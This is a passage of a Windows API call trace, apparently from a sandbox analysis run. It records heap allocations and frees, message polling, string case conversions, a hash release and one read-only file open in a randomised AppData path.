returned 0x24b1368 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0206.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0206.641] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.641] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.641] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.641] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.641] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa188 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0206.642] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0206.642] CryptDestroyHash (hHash=0xaa5760) returned 1 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.642] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.644] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0206.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0206.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0206.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0206.646] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.647] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0206.648] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.649] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.650] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.650] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0206.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0206.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.651] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x34b2250 [0206.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0206.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0206.653] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/UEbu8HvUsrKZg-ZGj.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\uebu8hvusrkzg-zgj.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x268 [0206.653] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.653] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0206.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0206.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0206.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0206.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0206.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.654] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0206.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0206.655] 